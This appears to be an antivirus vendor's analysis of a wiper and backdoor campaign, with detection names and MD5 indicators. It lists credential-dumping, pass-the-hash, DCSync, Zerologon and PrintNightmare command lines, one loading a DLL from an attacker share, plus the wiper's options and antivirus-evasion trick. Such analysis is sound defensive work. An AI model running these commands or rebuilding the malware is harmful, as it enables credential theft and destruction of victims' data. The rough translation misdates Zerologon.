1 Technical details
1.1 Modules and malware operation sequences
This malware includes many modules, including executable programs and various scripts, each of which has its small task.
The following is a list of malware files with a brief description of how they work.
File Name | Description |
wint.bat | Run the scheduler task to run the msdskint.exe file service |
msdskint.exe | Destroy the hard disk data (Wipe), change users’ passwords, delete Windows backup files, and, etc. |
Sharpk.exe | A tool for retrieving users’ authentication information |
uhsvc.exe | As a Httpservice to communicate with c & c servers, the hacker also used this file to copy the Sharpk.exe tool. |
Last file | Contents of the last corrupted file path |
Table 1 – Summary of malware layout performance
1.1.1 Description of the sharpk.exe file operation
The tool is released on Github and implements the Sekurlsa and lsadump modules from mimikatz. Sharpkatz is used to discover useful information from Windows-based hosts.
This tool consists of several modules that are designed for different attack functions. Some commonly used modules are:
MSV, Kerberos, TSPKG, Windows Credential Manager, Wdigest
The main modules that can be run by this tool are as follows:
- Lsadump
This module is used to extract the hash of a specific user.
- Pth
With the hash of a specific user, he uses all accesses to steal his username and password. This module does not require Admin access to work properly, and even a normal user can run this module.
- LogonPasswords
Displays validation information for recently logged-in users.
- Zerologon (for stealing Active Directory information)
Zerologon Vulnerability or CVE-2020-1472 is one of these vulnerabilities, first reported in September 2021. The vulnerability, caused by Microsoft’s way of implementing encryption on the Netlogon process, allows attackers to attack and steal Windows servers, especially Active Directory servers.
- DCSync
The DCSync module in sharpkatz allows an attacker to pretend to be a domain controller and retrieve the hash password from other domain controllers without executing code on the target.
The following table lists the arguments that can be downloaded from the sharpk.exe file along with their functionality.
Input Argument | Statement |
–Command ekeys | Displays a list of Kerberos encryption keys (Kerberos is a network authentication protocol) |
–Command msv | Recover user validation information from msv including logons, batch logons, and service logons |
–Command Kerberos | Retrieve user credentials from Kerberos |
–Command tspkg | Retrieve user credentials from tspkg |
–Command credman | Retrieve user credentials from credman |
–Command wdigest | Retrieve user credentials from wdigest |
–Command logonpasswords | Retrieve user credentials from logonpasswords |
–Command listshadows | View list of system backups |
–Command dumpsam –System syspath –Sam Sampath | Get dumped from validation information inside the SAM database |
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash | Create a process under the domain name or username validation by using the ntlm hash of the user password |
–Command pth –User username –Domain userdomain –Rc4 rc4key | Create a process under the rc4 key of a domain name or username |
–Command pth –Luid luid –NtlmHash ntlmhash | Replaces the ntlm hash for an existing logonsession. |
–Command pth –User username –Domain userdomain –NtlmHash ntlmhash | Create a process under the domain name or username validation by using the ntlm hash of the user password |
–Command dcsync –User user –Domain userdomain –DomainController dc | Get dumped from user credentials by username |
–Command dcsync –Guid guid –Domain userdomain –DomainController dc | Get dumped from user credentials by guid |
–Command dcsync –Domain userdomain –DomainController dc | Create a file in the current user temp folder, including information extracted from the AD |
–Command dcsync –User user –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword | Get dumping of user credentials by username using alternative credentials |
–Command dcsync –Guid guid –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword | Get dumping of user credentials by username using guid |
–Command dcsync –Domain userdomain –DomainController dc –AuthUser authuser –AuthDomain authdomain –AuthPassword authuserpassword | Create a file in the current user temp folder, containing information extracted from AD by alternative validation information |
–Command zerologon –Mode check –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ | Investigate the Zerologon vulnerability in the system |
–Command zerologon –Mode exploit –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ | Infiltration using zerologon vulnerability |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –User krbtgt –DomainController WIN-NSE5CPtp0 | Infiltrate using zerologon vulnerabilities and get dumped from user credentials by username |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –Guid guid –DomainController WIN-NSE5CPCPb22.l | Infiltration using zerologon vulnerability and dumping of user credentials by GUID |
–Command zerologon –Mode auto –Target WIN-NSE5CPCP07C.testlab2.local –MachineAccount WIN-NSE5CPCP07C $ –Domain testlab2.local –DomainController WIN-NSE5CPCP07C.testlab | Infiltrate using the zerologon vulnerability and create a file in the current user temp folder, including information extracted from AD by an alternative credential |
–Command printnightmare –Target dc –Library \\\\ mycontrolled \\ share \\ fun.dll | Infiltration using PrintNightmare vulnerability |
–Command printnightmare –Target dc –Library \\\\ mycontrolled \\ share \\ fun.dll –AuthUser user –AuthPassword password –AuthDomain dom | Infiltration using PrintNightmare vulnerabilities and credentials provided |
Table 2 – Description of Sharpkatz tool commands
1.1.2 Description of .NETWSM task operations
This scheduler is responsible for executing the wint.bat file.
c: \ programdata \ pcmr \ wint.bat
1.1.3 Description of the wint.bat file operation
This file is a malicious Wiper service. A service with the fake name of Windows Task Scheduler, which, as the name of the service indicates, uses the word “Taks” instead of the word “Tasks”. The Wiper file named msdskint.exe is found in various systems in the following paths:
HGH-HGH-KHSRAVI system:
c: \ windows \ ccmcache \ 6 \ msdskint.exe
Other systems:
c: \ programdata \ pcmr \ msdskint.exe
1.1.4 Description of msdskint.exe file operation
This file is a Wiper created by a hacker who can receive arguments from the input. If no input argument is entered, the file also has predefined arguments that use the same arguments during execution.
The hacker used this file using the tool “Eziriz.NET Reactor “pack to keep the malware code out of the sight of the analyst and antivirus. The following is a description of malware operations after decoding the program.
The following table lists the arguments that can be downloaded from the sharpk.exe file along with their functionality.
Input Argument | Statement |
-wipe-exclude | Paths after this argument are added to the list of malicious exceptions to prevent a wipe. |
-light-wipe | The number of times the desired malware buffer to destroy the fileSacrifice systems are written. |
-sessions | Allows all active sessions to be logged off and restarted. |
-delete-users | The accounts of logged-in users with this argument will be deleted from the system. |
-shadows | All backups of system data will be erased. |
-start-iis | The IIS service starts. |
-config | Operation not defined. |
-processes | The entered processes end with this argument. |
-Logs | Malware removes all Event viewer logs using Windows and Enum wevtutil.exe tools. |
-delete |
If this argument is entered, the files that are wiped will eventually be deleted from the system. (Windows Win32Native.DeleteFile function runs) |
-break-users | Change the password of the victim system users |
-wipe-only | Only files in the paths entered are corrupted. |
-purge | It means a complete cleanup in which the process of destroying the contents of the file is different from the normal process. |
-passwords | Operation not defined. |
-wipe-all | Destroy information on all system drives |
-stop-iis | The IIS service is stopped. |
Table 3 – Description of Wiper malware commands
The following is a detailed description of each of the arguments that need further explanation.
- -Break-users argument
If this argument is entered and a user is specified, the malware sets a password for each of the accounts defined in the system. This is the fixed string password “S7Y1a82R!” is.
Figure 2 – The malware changes the users’ password
- Argument –purge
This argument is used when wiping files. In general, the amount of malware considered to wipe information is a 200-byte buffer whose contents are randomly generated by an algorithm.
If the purge argument is entered, a value named full_purge is set in the malware code. This item means a complete cleanup for malware. In this case, the procedure for destroying malware on file information is to write the value inside the buffer in 200-byte blocks to the file to reach the end of the file.
The malware also has a list called purgeExtensions in its code, which includes the hacker candidate extensions. In this case, if the file to be destroyed has one of the following extensions, the data destruction process of that file will be the same as the full_purge process.
Figure 3 – Candidate extensions
In addition to the list above, there are other strings in the malware file that can be considered candidate extensions. These extensions are:
.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm , .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln,. cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab ~,. bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
- Argument -wipe-all
If this argument is entered, all active system drives are saved in a list. Then all the information on the drives is wiped.
When data is corrupted, 3 files are excluded:
- default.htm
- index.htm
- death_to_raisi.exe
The procedure for destroying data by malware, if the value of full_purge is not set or the file extension is not part of the candidate extensions, is that it first writes a 200-byte buffer of zero offsets to the file. It then divides the total file size by 1024. Stores this value in variable num4.
If a number is entered for the light_wipe argument, it calculates the minimum value between light_wipe and num4 and writes it in num4.
It then spaces 1024 bytes (0X400) by the number 4 times from the current offset and writes the same value over the next 200 bytes, and so on until it reaches the end of the file. Finally, it creates the lastfile2 file in the folder of the corrupted file and writes down the path of the file.
As mentioned earlier, the msdskint.exe file also has predefined arguments if it does not receive an argument as input. This file, if run under service, will have the following default arguments:
Figure 4 – List of strings as input arguments
Based on these arguments, this service will work as follows:
- The value of -light-wipe is equal to 3. This means that the data destruction buffer is written to each file 3 times.
- The IIS service is stopped.
- All EventViewer logs of the Windows operating system are deleted.
- All backups will be deleted.
- The value of processes – is equal to SQL *. That means the whole process of SQL strings ends in their names.
- All active drive information except corrupted paths is corrupted.
- Excluded paths by the hacker are as follows:
"C: \ Windows" "C: \ $ Recycle.Bin" "C: \ $ WinREAgent" "C: \ Config.Msi" "C: \ MSOCache" "C: \ Recovery" "C: \ Program Files \ IBM \ *" "C: \ System Volume Information" "C: \ Program Files \ dotnet" "C: \ Program Files (x86) \ dotnet *" "C: \ Program Files \ Symantec *" "C: \ Program Files (x86) \ Symantec *" "C: \ Program Files (x86) \ Padvish *" "C: \ Program Files \ Kaspersky *" "C: \ Program Files (x86) \ Kaspersky *" "C: \ Program Files \ Microsoft *" "C: \ Program Files (x86) \ Microsoft *" "C: \ Program Files \ Windows *" "C: \ Program Files (x86) \ Windows *"
There is a function in the program commands that indicates that the hacker was sensitive to the antivirus. For example, as shown in Figure 5, the malware monitors the list of processes running on the system. If the rewards service or UI is high among these processes, the malware tries to perform the wipe operation in another way instead of executing its default function for Wipe Information.
The reason for this change in tactics on the part of the malware seems to be an escape from the Padvish behavioral detection system, which the wipe method detects and automatically stops immediately; But in any case, the second method of malware is also detected and stopped by Padvish.
In the second method, the malware tries to create a temporary bat file (tmp.bat) for each of the system files and creates two timed tasks for these temporary files with the system license.
Figure 5 – Antivirus service and UI search by malware
Figure 6 – Change the data destruction method by malware after finding the Padvish antivirus service
The following example shows an example of a bat file created:
Figure 7 – An example of a bat file created to destroy information
As shown in the contents of this bat file, the malware first uses the fsutil tool of the Windows operating system to file a file with null content the size of the file it wanted to destroy (here 3072 bytes) with the qipe extension. has constructed. He then intended to replace this fake file with the original file.
Knowing that Padvish Antivirus can prevent the destruction of system information, the hacker has tried to use another way to delete information using standard system tools. However, the Padvish anti-ransomware component has prevented this type of attack.
There are commands in the program code that indicate that this malware can save the program execution time during the log operation as follows:
In the malware code, strings with the titles “- Excluded”, “- Skipped”, “BreakSelectedUsers”, “DeleteSelectedUsers”, “KillProcesses” and… It is visible. At the end of the operation, this log ends with the string “Finished on” and time recording. However, the hacker did not need to save the log using the Wiper file. Because the code for the Output function, which is responsible for printing the result of the operation, is not provided.
1.1.5 Description of uhsvc.exe file operation
This file acts as an HTTP service for the hacker. Information about the hacker’s commands is stored in two files, uhsvc.exe.start and uhsvc.exe.ini.
This service, which is registered in the system as Microsoft Update Health Host, has commands for downloading and uploading files, as well as connecting to the SQL database and sending the results to a malicious server, and manipulating local files. Various versions of this HTTP service have been found, including 0.1.3vXH and 0.1.4vXH. These versions do not differ in overall performance and accept the same commands.
This file is similar to the Wiper Hacker file using the “Eziriz..NET Reactor “packed. The following results are obtained according to the items observed after decoding the commands:
1.The malware creates a tcpListener in the victim system after running it under the service. The following is a version of the malware that uses port 9399. In the example found from the uhsvc.exe.start file, the hacker allowed incoming packets to port 9399 from outside the network to the victim system in the firewall.
Figure 8 – Content of the uhsvc.exe.start file
2.Malware has the ability to receive different commands from the hacker server and execute them. The malware executes these commands using the cmd tool.
Figure 9 – Execution of hacker commands by Shell
3.Use sqlconnection and sqlCommand functions to execute different queries on the SQL database
4.Create a file
Figure 10 – File creation by a hacker through malware
5.The malware has the ability to zip and unzip the contents of directories, download/upload and, if necessary, delete the hacker files. This malware uses the IonicZip library to compress files.
Figure 11 – Ability to compress/open and delete files
Figure 12 – Ability to manipulate the directories contents
6.Ability to get the proxy address of the server to communicate with it through the commands “p =” and “b =”
Figure 14 – Proxy setting
7.Ability to display malware version for the hacker (Hacker has used several versions of Httpservice to implement his operations).
Figure 15 – Display of malware version
8.Ability to display the current path of the malware file (the malware path was “c: \ programdata \ pcmr \ uhsvc.exe”).
9.Ability to create a log file and send it to show possible errors to the hacker
Figure 16 – Creating a log file
The following table shows the list of operations supported by the malware:
performance of the | Ads code |
Shellexecute with #zip support | a_1 = s |
Run SQL commands | a_1 = c |
View output and error logs and delete them | a_1 = i1 |
Delete output and error logs | a_1 = i2 |
Run cmd interactively | a_1 = i |
Shellexecute | Cmd = |
Show Malware path | W_i |
Show Malware Version | V_i |
Act as a proxy and forward connection to another website / infected node | P = OR b = |
Write any file | M = afe = 1 |
Run SQL commands | Con |
File Manager (Browse directories, Download / Upload Files,…) | PRT |
Read / Write based on GET | other |
Table 4 – Malware Web Service Commands
2 How to encounter the malware
All known examples of this malware are called HackTool.Win32.HTTPbackdoor, HackTool.Win32.SharpKatz and Trojan.Win32.QWipe is detected by Padvish.
In addition, the unique feature of protecting Padvish data by detecting the Wipe function by this malware prevents the malware from destroying the information and terminates its execution.
3 Symptoms of Infection (IOC)
File Name | MD5 |
uhsvc.exe |
466832ef3f81f1cc37466be9e1b7c4d2 9fbab064ec583f80dc15e1abc2ebcad3 2529ed634df912d95d52be717560b0b6 cc97e34cf19f56263abd0f89e907cf7a 66e6d3b03613074f38b2a6acff8e8229 94354ecf588835cea2352b873211290e af029e3168e27394020b3f4315b2419b 2c1e86a5c5c5ad19d64baa66e78af6f1 e633f5ce289cdcbdee93b7c02178fa35 4cc3665c4fb23ace6b0f9b396c66f8e6 |
uhsvc.exe.start | 381d8239561c3714c1b71f0c2df4f57e |
msdskint.exe | 13e7caebf00dd2315885e1f47030eb3c |
wint.bat | 0aa3b91d584803a39250742b69173841 |
Sharpk.exe | 3ea25f166bef1bf79c374f16f2e4e29f |